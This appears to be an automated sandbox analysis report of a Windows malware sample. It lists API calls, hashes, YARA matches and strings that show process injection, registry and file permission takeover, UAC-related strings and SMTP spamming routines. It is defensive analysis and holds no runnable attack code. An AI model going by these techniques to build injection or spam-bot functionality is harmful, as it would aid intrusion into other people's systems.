                                                                                        • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
                                                                                        • API String ID: 1628651668-3716895483
                                                                                        • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                        • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                        • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                          • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                        • API String ID: 4207808166-1381319158
                                                                                        • Opcode ID: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction ID: 8f9aaa01d81d5e00f35a14cef107f65a3e8f5b831808d54868c05c9eb27f2f66
                                                                                        • Opcode Fuzzy Hash: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction Fuzzy Hash: D451D9B05043446FD320AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 00402A83
                                                                                        • HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 00402A86
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                        • htons.WS2_32(00000000), ref: 00402ADB
                                                                                        • select.WS2_32 ref: 00402B28
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                        • htons.WS2_32(?), ref: 00402B71
                                                                                        • htons.WS2_32(?), ref: 00402B8C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1639031587-0
                                                                                        • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                        • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                        • ExitProcess.KERNEL32 ref: 00404121
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2404124870-2980165447
                                                                                        • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                        • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                        • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                        • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                        • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2438460464-0
                                                                                        • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                        • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                        • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID: *p@
                                                                                        • API String ID: 3429775523-2474123842
                                                                                        • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                        • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 026165F6
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02616610
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02616631
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02616652
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction ID: e6359c7c106158552dc72e23f537df794f8e037d0a8638377616cd0320c8a5bc
                                                                                        • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction Fuzzy Hash: 5D117375600258BFDB219F65DC45F9B3FACEB057A5F144024FA08E7251D7B1ED40CAA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                        • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                        • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00408EAB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                          • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                          • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3754425949-0
                                                                                        • Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                        • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                        • Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                        • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                        • Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
                                                                                        • Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                        • Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction ID: 996a4dd4d1d31b0d359995f160e8a309698b2c0960f6a23e9d15c78da0823b90
                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction Fuzzy Hash: DF11A572340100AFD754DF69ECC8FA673EAEB89320B198155ED04CB352D675EC42C761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction ID: e7823351478a29d2a85874302e36bfb9e95c4145b25703ddd37f56d31d2d295e
                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction Fuzzy Hash: 5A01A276B106048FDF21CF24C805BAA33E9EB86216F4984A5DD0AD7385E774B9818B90
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32 ref: 02619E6D
                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02619FE1
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02619FF2
                                                                                        • lstrcat.KERNEL32(?,0041070C), ref: 0261A004
                                                                                        • GetFileAttributesExA.KERNEL32(?,?,?), ref: 0261A054
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0261A09F
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0261A0D6
                                                                                        • lstrcpy.KERNEL32 ref: 0261A12F
                                                                                        • lstrlen.KERNEL32(00000022), ref: 0261A13C
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 02619F13
                                                                                          • Part of subcall function 02617029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02617081
                                                                                          • Part of subcall function 02616F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02617043), ref: 02616F4E
                                                                                          • Part of subcall function 02616F30: GetProcAddress.KERNEL32(00000000), ref: 02616F55
                                                                                          • Part of subcall function 02616F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02616F7B
                                                                                          • Part of subcall function 02616F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02616F92
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0261A1A2
                                                                                        • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0261A1C5
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0261A214
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0261A21B
                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 0261A265
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0261A29F
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 0261A2C5
                                                                                        • lstrcat.KERNEL32(?,00000022), ref: 0261A2D9
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 0261A2F4
                                                                                        • wsprintfA.USER32 ref: 0261A31D
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0261A345
                                                                                        • lstrcat.KERNEL32(?,?), ref: 0261A364
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0261A387
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0261A398
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0261A1D1
                                                                                          • Part of subcall function 02619966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0261999D
                                                                                          • Part of subcall function 02619966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 026199BD
                                                                                          • Part of subcall function 02619966: RegCloseKey.ADVAPI32(?), ref: 026199C6
                                                                                        • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0261A3DB
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0261A3E2
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0261A41D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                        • String ID: "$"$"$D$P$\
                                                                                        • API String ID: 1653845638-2605685093
                                                                                        • Opcode ID: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction ID: a428442591a48f7a5758b6520b6dd59f93fa78c3585de0315dd98221bc02c418
                                                                                        • Opcode Fuzzy Hash: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction Fuzzy Hash: 8BF155B1C41259AFDF11DBA0CD48FEF77BDAB08304F0844AAE609E2151E775AA85CF64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02617D21
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02617D46
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617D7D
                                                                                        • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02617DA2
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02617DC0
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617DD1
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617DE5
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617DF3
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02617E03
                                                                                        • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02617E12
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617E19
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02617E35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2976863881-1403908072
                                                                                        • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction ID: e7bbb1a8db83492ccd64379e8a5bb20af06a80e0ac608be8dd40a425ef388ccd
                                                                                        • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction Fuzzy Hash: 38A16C71900259AFDF12CFA0DC88FEFBBB9FB08345F088169E505E6250D775AA85CB64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
                                                                                        • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                        • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2976863881-1403908072
                                                                                        • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                        • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                        • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                        • API String ID: 2400214276-165278494
                                                                                        • Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                        • Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040A7FB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                        • wsprintfA.USER32 ref: 0040A8AF
                                                                                        • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                        • wsprintfA.USER32 ref: 0040A8E2
                                                                                        • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                        • wsprintfA.USER32 ref: 0040A9B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$send$lstrlenrecv
                                                                                        • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                        • API String ID: 3650048968-2394369944
                                                                                        • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                        • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02617A96
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617ACD
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 02617ADF
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02617B01
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02617B1F
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617B39
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617B4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617B58
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02617B68
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02617B77
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617B7E
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02617B9A
                                                                                        • GetAce.ADVAPI32(?,?,?), ref: 02617BCA
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617BF1
                                                                                        • DeleteAce.ADVAPI32(?,?), ref: 02617C0A
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617C2C
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617CB1
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617CBF
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02617CD0
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02617CE0
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617CEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: 9e59ed8d95d15a916874d7ebc3e673ef879492c354e686dc81b426dfa18adb53
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction Fuzzy Hash: 89813D7190021AEFDB12CFA5DD84FEEFBB8AF08304F18816AE505E6250D775A685CB64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
